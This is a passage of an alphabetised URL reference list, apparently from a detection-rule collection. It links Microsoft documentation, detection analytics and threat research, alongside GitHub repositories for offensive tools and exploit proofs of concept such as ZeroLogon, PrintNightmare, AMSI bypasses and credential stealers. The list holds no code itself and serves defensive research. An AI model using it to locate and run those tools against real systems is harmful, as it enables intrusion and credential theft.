erver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps\nhttps://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate\nhttps://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo\nhttps://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nhttps://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15\nhttps://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/procdump\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/psexec\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/psservice\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sdelete\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\nhttps://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\nhttps://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/taef/\nhttps://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nhttps://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\nhttps://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter\nhttps://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all\nhttps://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps\nhttps://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\nhttps://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\nhttps://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\nhttps://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\nhttps://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\nhttps://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nhttps://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys\nhttps://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/windows/win32/shell/launch\nhttps://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\nhttps://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\nhttps://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture\nhttps://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nhttps://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\nhttps://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nhttps://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps\nhttps://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatd/index.html\nhttps://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html\nhttps://docs.python.org/2/library/simplehttpserver.html\nhttps://docs.python.org/3/library/site.html\nhttps://docs.python.org/3/using/cmdline.html#cmdoption-c\nhttps://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html\nhttps://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nhttps://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\nhttps://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\nhttps://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf\nhttps://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nhttps://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing\nhttps://dtm.uk/wuauclt/\nhttps://duo.com/docs/adminapi#logs\nhttps://dzone.com/articles/remote-debugging-java-applications-with-jdwp\nhttps://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions\nhttps://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/\nhttps://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88\nhttps://embracethered.com/blog/posts/2020/chrome-spy-remote-control/\nhttps://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\nhttps://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\nhttps://emkc.org/s/RJjuLa\nhttps://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nhttps://en.wikipedia.org/wiki/Hangul_(word_processor)\nhttps://en.wikipedia.org/wiki/HTML_Application\nhttps://en.wikipedia.org/wiki/IExpress\nhttps://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions\nhttps://en.wikipedia.org/wiki/Nohup\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nhttps://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/\nhttps://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/\nhttps://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\nhttps://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\nhttps://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nhttps://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html\nhttps://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/\nhttps://evasions.checkpoint.com/techniques/macos.html\nhttps://f5.pm/go-59627.html\nhttps://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\nhttps://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nhttps://fieldeffect.com/blog/grixba-play-ransomware-impersonates-sentinelone\nhttps://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html\nhttps://firewalld.org/documentation/man-pages/firewall-cmd.html\nhttps://forensafe.com/blogs/typedpaths.html\nhttps://forensicitguy.github.io/agenttesla-vba-certutil-download/\nhttps://forensicitguy.github.io/analyzing-magnitude-magniber-appx/\nhttps://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/\nhttps://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html\nhttps://fourcore.io/blogs/threat-hunting-browser-credential-stealing\nhttps://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\nhttps://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang\nhttps://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983\nhttps://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26\nhttps://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\nhttps://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nhttps://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340\nhttps://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712\nhttps://gist.github.com/Capybara/6228955\nhttps://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8\nhttps://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee\nhttps://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\nhttps://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d\nhttps://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611\nhttps://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nhttps://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\nhttps://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38\nhttps://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7\nhttps://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nhttps://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nhttps://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346\nhttps://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f\nhttps://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af\nhttps://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nhttps://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd\nhttps://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\nhttps://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10\nhttps://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\nhttps://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5\nhttps://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb\nhttps://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\nhttps://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6\nhttps://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf\nhttps://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nhttps://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420\nhttps://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=\nhttps://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1\nhttps://github.com/0xf4n9x/CVE-2022-46169\nhttps://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\nhttps://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md\nhttps://github.com/1337Rin/Swag-PSO\nhttps://github.com/1N3/Sn1per\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol\nhttps://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter\nhttps://github.com/3proxy/3proxy\nhttps://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1\nhttps://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\nhttps://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf\nhttps://github.com/adrecon/ADRecon\nhttps://github.com/adrecon/AzureADRecon\nhttps://github.com/advisories/GHSA-7g5f-wrx8-5ccf\nhttps://github.com/afwu/PrintNightmare\nhttps://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\nhttps://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md\nhttps://github.com/AlessandroZ/LaZagne/tree/master\nhttps://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\nhttps://github.com/AlsidOfficial/WSUSpendu/\nhttps://github.com/amjcyber/EDRNoiseMaker\nhttps://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo\nhttps://github.com/antonioCoco/JuicyPotatoNG\nhttps://github.com/antonioCoco/RoguePotato\nhttps://github.com/antonioCoco/RogueWinRM\nhttps://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh\nhttps://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782\nhttps://github.com/apache/spark/pull/36315/files\nhttps://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md\nhttps://github.com/arget13/DDexec\nhttps://github.com/Arno0x/DNSExfiltrator\nhttps://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1\nhttps://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nhttps://github.com/audibleblink/xordump\nhttps://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml\nhttps://github.com/Azure/Azure-Sentinel/pull/3059\nhttps://github.com/Azure/SimuLand\nhttps://github.com/bats3c/ADCSPwn\nhttps://github.com/bats3c/EvtMute\nhttps://github.com/BC-SECURITY/Empire\nhttps://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\nhttps://github.com/besimorhino/powercat\nhttps://github.com/binderlabs/DirCreate2System\nhttps://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231\nhttps://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36\nhttps://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc\nhttps://github.com/BloodHoundAD/AzureHound\nhttps://github.com/BloodHoundAD/BloodHound\nhttps://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\nhttps://github.com/BloodHoundAD/SharpHound\nhttps://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs\nhttps://github.com/bohops/WSMan-WinRM\nhttps://github.com/boku7/injectAmsiBypass\nhttps://github.com/boku7/spawn\nhttps://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp\nhttps://github.com/bugch3ck/SharpLdapWhoami\nhttps://github.com/byt3bl33d3r/CrackMapExec\nhttps://github.com/byt3bl33d3r/CrackMapExec/\nhttps://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242\nhttps://github.com/byt3bl33d3r/SILENTTRINITY\nhttps://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\nhttps://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\nhttps://github.com/calebstewart/CVE-2021-1675\nhttps://github.com/carlospolop/PEASS-ng\nhttps://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\nhttps://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\nhttps://github.com/CCob/MirrorDump\nhttps://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\nhttps://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md\nhttps://github.com/CICADA8-Research/RemoteKrbRelay\nhttps://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40\nhttps://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11\nhttps://github.com/clearvector/lambda-spy\nhttps://github.com/cloudflare/cloudflared\nhttps://github.com/cloudflare/cloudflared/releases\nhttps://github.com/codewhitesec/HandleKatz\nhttps://github.com/codewhitesec/SysmonEnte/\nhttps://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png\nhttps://github.com/connormcgarr/LittleCorporal\nhttps://github.com/corelight/CVE-2021-1675\nhttps://github.com/CsEnox/EventViewer-UACBypass\nhttps://github.com/cube0x0\nhttps://github.com/cube0x0/CVE-2021-1675\nhttps://github.com/cube0x0/CVE-2021-36934\nhttps://github.com/cube0x0/KrbRelay\nhttps://github.com/cw1997/NATBypass\nhttps://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf\nhttps://github.com/D1rkMtr/UnhookingPatch\